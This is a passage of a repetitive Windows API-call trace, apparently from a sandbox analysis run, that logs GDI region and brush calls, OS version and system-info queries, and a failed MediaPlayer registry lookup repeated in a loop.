0xb604027d [0017.451] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f8 [0017.451] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408f9 [0017.451] CombineRgn (hrgnDst=0x10408f8, hrgnSrc1=0xc0040713, hrgnSrc2=0xb604027d, iMode=1) returned 1 [0017.451] CombineRgn (hrgnDst=0x10408f9, hrgnSrc1=0xc0040713, hrgnSrc2=0xb604027d, iMode=4) returned 2 [0017.451] CreateSolidBrush (color=0xff) returned 0x21008f7 [0017.451] CreateSolidBrush (color=0xff0000) returned 0x11008fa [0017.451] DeleteObject (ho=0x11008fa) returned 1 [0017.451] DeleteObject (ho=0xb604027d) returned 1 [0017.451] DeleteObject (ho=0xc0040713) returned 1 [0017.451] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.451] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.451] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.452] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.452] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.452] BeginPath (hdc=0x0) returned 0 [0017.452] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.452] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.452] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.452] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.452] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.452] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.452] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.452] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.452] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb704027d [0017.452] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc1040713 [0017.452] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408fb [0017.452] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408fc [0017.452] CombineRgn (hrgnDst=0x10408fb, hrgnSrc1=0xb704027d, hrgnSrc2=0xc1040713, iMode=1) returned 1 [0017.452] CombineRgn (hrgnDst=0x10408fc, hrgnSrc1=0xb704027d, hrgnSrc2=0xc1040713, iMode=4) returned 2 [0017.452] CreateSolidBrush (color=0xff) returned 0x21008fa [0017.452] CreateSolidBrush (color=0xff0000) returned 0x11008fd [0017.452] DeleteObject (ho=0x11008fd) returned 1 [0017.452] DeleteObject (ho=0xc1040713) returned 1 [0017.452] DeleteObject (ho=0xb704027d) returned 1 [0017.452] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.452] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.452] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.452] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.452] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.452] BeginPath (hdc=0x0) returned 0 [0017.452] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.452] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.452] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.452] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.452] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.453] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.453] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.453] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.453] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc2040713 [0017.453] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb804027d [0017.453] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408fe [0017.453] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ff [0017.453] CombineRgn (hrgnDst=0x10408fe, hrgnSrc1=0xc2040713, hrgnSrc2=0xb804027d, iMode=1) returned 1 [0017.453] CombineRgn (hrgnDst=0x10408ff, hrgnSrc1=0xc2040713, hrgnSrc2=0xb804027d, iMode=4) returned 2 [0017.453] CreateSolidBrush (color=0xff) returned 0x21008fd [0017.453] CreateSolidBrush (color=0xff0000) returned 0x1100900 [0017.453] DeleteObject (ho=0x1100900) returned 1 [0017.453] DeleteObject (ho=0xb804027d) returned 1 [0017.453] DeleteObject (ho=0xc2040713) returned 1 [0017.453] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.453] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.453] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.453] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.453] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.453] BeginPath (hdc=0x0) returned 0 [0017.453] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.453] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.453] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.454] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.454] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.454] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.454] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.454] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.454] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb904027d [0017.454] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc3040713 [0017.454] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040901 [0017.454] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040902 [0017.454] CombineRgn (hrgnDst=0x1040901, hrgnSrc1=0xb904027d, hrgnSrc2=0xc3040713, iMode=1) returned 1 [0017.454] CombineRgn (hrgnDst=0x1040902, hrgnSrc1=0xb904027d, hrgnSrc2=0xc3040713, iMode=4) returned 2 [0017.454] CreateSolidBrush (color=0xff) returned 0x2100900 [0017.454] CreateSolidBrush (color=0xff0000) returned 0x1100903 [0017.454] DeleteObject (ho=0x1100903) returned 1 [0017.454] DeleteObject (ho=0xc3040713) returned 1 [0017.454] DeleteObject (ho=0xb904027d) returned 1 [0017.454] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.454] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.454] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.454] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.454] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.454] BeginPath (hdc=0x0) returned 0 [0017.454] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.454] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.454] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.454] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.454] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.454] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.454] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.455] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.455] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc4040713 [0017.455] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xba04027d [0017.455] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040904 [0017.455] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040905 [0017.455] CombineRgn (hrgnDst=0x1040904, hrgnSrc1=0xc4040713, hrgnSrc2=0xba04027d, iMode=1) returned 1 [0017.455] CombineRgn (hrgnDst=0x1040905, hrgnSrc1=0xc4040713, hrgnSrc2=0xba04027d, iMode=4) returned 2 [0017.455] CreateSolidBrush (color=0xff) returned 0x2100903 [0017.455] CreateSolidBrush (color=0xff0000) returned 0x1100906 [0017.455] DeleteObject (ho=0x1100906) returned 1 [0017.455] DeleteObject (ho=0xba04027d) returned 1 [0017.455] DeleteObject (ho=0xc4040713) returned 1 [0017.455] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.455] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.455] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.455] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.455] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.455] BeginPath (hdc=0x0) returned 0 [0017.455] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.455] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.455] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.455] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.455] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.455] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.455] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.455] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.456] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbb04027d [0017.456] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc5040713 [0017.456] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040907 [0017.456] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040908 [0017.456] CombineRgn (hrgnDst=0x1040907, hrgnSrc1=0xbb04027d, hrgnSrc2=0xc5040713, iMode=1) returned 1 [0017.456] CombineRgn (hrgnDst=0x1040908, hrgnSrc1=0xbb04027d, hrgnSrc2=0xc5040713, iMode=4) returned 2 [0017.456] CreateSolidBrush (color=0xff) returned 0x2100906 [0017.456] CreateSolidBrush (color=0xff0000) returned 0x1100909 [0017.456] DeleteObject (ho=0x1100909) returned 1 [0017.456] DeleteObject (ho=0xc5040713) returned 1 [0017.456] DeleteObject (ho=0xbb04027d) returned 1 [0017.456] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.456] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.456] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.456] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.456] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.456] BeginPath (hdc=0x0) returned 0 [0017.456] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.456] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.456] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.456] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.456] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.456] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.456] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.456] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.456] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc6040713 [0017.456] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbc04027d [0017.456] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104090a [0017.456] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104090b [0017.456] CombineRgn (hrgnDst=0x104090a, hrgnSrc1=0xc6040713, hrgnSrc2=0xbc04027d, iMode=1) returned 1 [0017.457] CombineRgn (hrgnDst=0x104090b, hrgnSrc1=0xc6040713, hrgnSrc2=0xbc04027d, iMode=4) returned 2 [0017.457] CreateSolidBrush (color=0xff) returned 0x2100909 [0017.457] CreateSolidBrush (color=0xff0000) returned 0x110090c [0017.457] DeleteObject (ho=0x110090c) returned 1 [0017.457] DeleteObject (ho=0xbc04027d) returned 1 [0017.457] DeleteObject (ho=0xc6040713) returned 1 [0017.457] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.457] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.457] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.457] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.457] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.457] BeginPath (hdc=0x0) returned 0 [0017.457] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.457] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.457] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.457] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.457] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.457] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.457] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.457] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.457] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbd04027d [0017.457] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc7040713 [0017.457] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104090d [0017.457] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104090e [0017.457] CombineRgn (hrgnDst=0x104090d, hrgnSrc1=0xbd04027d, hrgnSrc2=0xc7040713, iMode=1) returned 1 [0017.457] CombineRgn (hrgnDst=0x104090e, hrgnSrc1=0xbd04027d, hrgnSrc2=0xc7040713, iMode=4) returned 2 [0017.457] CreateSolidBrush (color=0xff) returned 0x210090c [0017.457] CreateSolidBrush (color=0xff0000) returned 0x110090f [0017.457] DeleteObject (ho=0x110090f) returned 1 [0017.457] DeleteObject (ho=0xc7040713) returned 1 [0017.457] DeleteObject (ho=0xbd04027d) returned 1 [0017.458] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.458] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.458] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.458] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.458] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.458] BeginPath (hdc=0x0) returned 0 [0017.458] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.458] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.458] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.458] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.458] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.458] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.458] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.458] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.458] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc8040713 [0017.458] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbe04027d [0017.458] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040910 [0017.458] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040911 [0017.458] CombineRgn (hrgnDst=0x1040910, hrgnSrc1=0xc8040713, hrgnSrc2=0xbe04027d, iMode=1) returned 1 [0017.458] CombineRgn (hrgnDst=0x1040911, hrgnSrc1=0xc8040713, hrgnSrc2=0xbe04027d, iMode=4) returned 2 [0017.458] CreateSolidBrush (color=0xff) returned 0x210090f [0017.458] CreateSolidBrush (color=0xff0000) returned 0x1100912 [0017.458] DeleteObject (ho=0x1100912) returned 1 [0017.458] DeleteObject (ho=0xbe04027d) returned 1 [0017.458] DeleteObject (ho=0xc8040713) returned 1 [0017.458] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.458] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.459] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.459] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.459] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.459] BeginPath (hdc=0x0) returned 0 [0017.459] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.459] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.459] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.459] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.459] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.459] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.459] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.459] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.459] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbf04027d [0017.459] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc9040713 [0017.459] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040913 [0017.459] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040914 [0017.459] CombineRgn (hrgnDst=0x1040913, hrgnSrc1=0xbf04027d, hrgnSrc2=0xc9040713, iMode=1) returned 1 [0017.459] CombineRgn (hrgnDst=0x1040914, hrgnSrc1=0xbf04027d, hrgnSrc2=0xc9040713, iMode=4) returned 2 [0017.459] CreateSolidBrush (color=0xff) returned 0x2100912 [0017.459] CreateSolidBrush (color=0xff0000) returned 0x1100915 [0017.459] DeleteObject (ho=0x1100915) returned 1 [0017.459] DeleteObject (ho=0xc9040713) returned 1 [0017.459] DeleteObject (ho=0xbf04027d) returned 1 [0017.459] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.459] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, 